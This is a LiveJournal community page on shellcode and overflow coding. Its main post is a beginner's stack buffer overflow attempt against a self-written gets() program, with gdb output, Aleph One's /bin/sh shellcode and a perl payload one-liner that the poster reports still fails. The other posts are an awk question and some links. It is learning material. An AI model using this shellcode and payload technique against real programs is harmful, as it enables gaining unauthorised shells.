?

Log in

Shellcode development / Overflow coding community's Journal
 
[Most Recent Entries] [Calendar View] [Friends]

Below are the 5 most recent journal entries recorded in Shellcode development / Overflow coding community's LiveJournal:

[ << Previous 20 ]
Monday, July 27th, 2009
5:25 pm
[amaena]
Text maipulation help please
Ok so I have text in the following format

1111 => 2976,Random User,user@user.com
2222 => 562976,Random User2,user2@user.com
3333 => 2678976,Random User3,user3@user.com
4444 => 291176,Random User4,user4@user.com

Basically I want to find in the file where the first column matches a value. Once I have that line identified, I want to replace the 3rd field with a new number. And make the changes in the file to reflect that while leaving everything else as is.

Now I have something that kinda does what I want in the form of:

export EXT=2222
export b1=5050
awk -v var="$EXT" '$1 ~ var {print $3","$4}' file-with-text | awk -F ',' -v nv="$b1" '{$1 = nv; print $1","$2,$3","$4}'

This will produce:
5050,Random User2,user2@user.com

But I am positive this is not the most elegant solution, and I don't know how to properly replace that in the file without being more inefficient.

Help?
(x posted)
Saturday, October 8th, 2005
11:53 am
[coltseavers]
Buffer overflow tutorial for beginner
Hi all,

I am new to this forum and totally new to buffer overflows, so please bear with me. I am trying to
understand how buffer overflows work and I think I am really that close to succeeding
but there is still something missing because I can't get a shell.
So here's what I have done so far, maybe you can spot my mistake:

1. Created a vulnerable C program

$ cat gameover.c
#include
[Error: Irreparable invalid markup ('<stdio.h>') in entry. Owner must fix manually. Raw contents below.]

Hi all,

I am new to this forum and totally new to buffer overflows, so please bear with me. I am trying to
understand how buffer overflows work and I think I am really that close to succeeding
but there is still something missing because I can't get a shell.
So here's what I have done so far, maybe you can spot my mistake:

1. Created a vulnerable C program

$ cat gameover.c
#include <stdio.h>

int echo() {

char buf[200];

gets(buf);
puts(buf);

}

int main() {

printf("Please enter a string:");
echo();
return 0;

}

2. Compiled the software and got the return address for buf:

$ ls
gameover gameover.c

$ gcc -g gameover.c -o gameover
/tmp/ccKSgDEi.o(.text+0x13): In function `echo':
/home/mssf1/gameover.c:7: warning: the `gets' function is dangerous and should
not be used.

$ ls -la gameover*
-rwxr-xr-x 1 myuser myuser 17164 Oct 8 01:25 gameover
-rw-r--r-- 1 myuser myuser 169 Oct 8 00:55 gameover.c

$ gdb gameover
GNU gdb 6.3-debian
Copyright 2004 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i386-linux"...Using host libthread_db library
"/lib/libthread_db.so.1".

(gdb) break echo
Breakpoint 1 at 0x80483fd: file gameover.c, line 7.

(gdb) run
Starting program: /home/mssf1/gameover

Breakpoint 1, echo () at gameover.c:7
7 gets(buf);
(gdb) next
Please enter a string:textstring
8 puts(buf);
(gdb) print &buf
$1 = (char (*)[200]) 0xbffffcf0
(gdb) quit

So I have the address for buf, and that's 0xbffffcf0. As several runs have
confirmed, this address is not changing each time I ran the program so it is
a constant value. Great.

3. Getting the number of characters to overflow EBP and EIP:

$ perl -e 'print "A"x212' | ./gameover
Please enter a string:AAAAAAAA etc

$ perl -e 'print "A"x216' | ./gameover
Please enter a string:AAAAAAAA etc
Illegal instruction

$ gdb gameover
GNU gdb 6.3-debian
Copyright 2004 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i386-linux"...Using host libthread_db library
"/lib/libthread_db.so.1".

(gdb) run
Starting program: /home/mssf1/gameover
Please enter a string:AAAAAAAAAAA (212 times)

Program exited normally.

(gdb) run
Starting program: /home/mssf1/gameover
Please enter a string:AAAAAAAAAAAAAAAA (216 times)

Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()

(gdb) info registers
eax 0x0 0
ecx 0x40018000 1073840128
edx 0x0 0
ebx 0x4014a880 1075095680
esp 0xbffffd08 0xbffffd08
ebp 0x41414141 0x41414141
esi 0x40016540 1073833280
edi 0xbffffe34 -1073742284
eip 0x41414141 0x41414141
eflags 0x286 646
cs 0x23 35
ss 0x2b 43
ds 0x2b 43
es 0x2b 43
fs 0x0 0
gs 0x0 0
(gdb) quit

Alright so now I know the number of characters to overflow these two registers.

4. Get a shell code and construct the attack

I will try to create my own shellcode next time but this time I downloaded one
from shellcode.org (Aleph's code):

\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh

This is 45 bytes long, ok. So I then have 216-45=171 bytes left for the return
address and the nops. I then calculated 20 x 4 bytes for the return address
and the rest for the nops and finally I get:

91 x 1 byte nop instruction (91 times)
45 x 1 bytes: shellcode
20 x 4 bytes: return address (20 times)

5. Execute attack

$ perl -e 'print "\x90"x91 .
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh" .
"\x0f\xcf\xff\xfb"x20' | ./gameover
Please enter a string:ë^1ÀFF
°
óV

Í1ÛØ@ÍèÜÿÿÿ/bin/shÏÿûÏÿûÏÿûÏÿûÏÿûÏÿûÏÿûÏÿûÏÿûÏÿûÏÿûÏÿûÏÿûÏÿûÏÿûÏÿûÏÿûÏÿûÏÿûÏÿû
Illegal instruction

Why does this not work? Where is my mistake here? Thank you very very much.

Get the good work up!

Best regards,
Colt
Wednesday, September 15th, 2004
1:21 am
[hohf]
Just wanted to post a note that the vuln-dev challenges seem not to be forgotten. :-)

http://archives.neohapsis.com/archives/vuln-dev/2004-q3/0066.html

Current Mood: sleepy
Wednesday, May 26th, 2004
2:53 am
[yaarg]
Shellcode fun...
Thought I would just point out that Pull the Plug is back online.....

Current Mood: sleepy
Sunday, March 21st, 2004
1:19 am
[hohf]
Shelcoder's Handbook
I recently stumbled across this article talking about a book called
the "Shellcoder's Handbook". Sounds quite good to me.

What do you think of it? Maybe somebody read this book? Maybe somebody is going to
read this book? (Maybe somebody even wrote this book?)

http://www.linuxsecurity.com/articles/security_sources_article-9049.html
http://www.nwfusion.com/news/2004/0315experpubli.html
[ << Previous 20 ]
Shellcode.org   About LiveJournal.com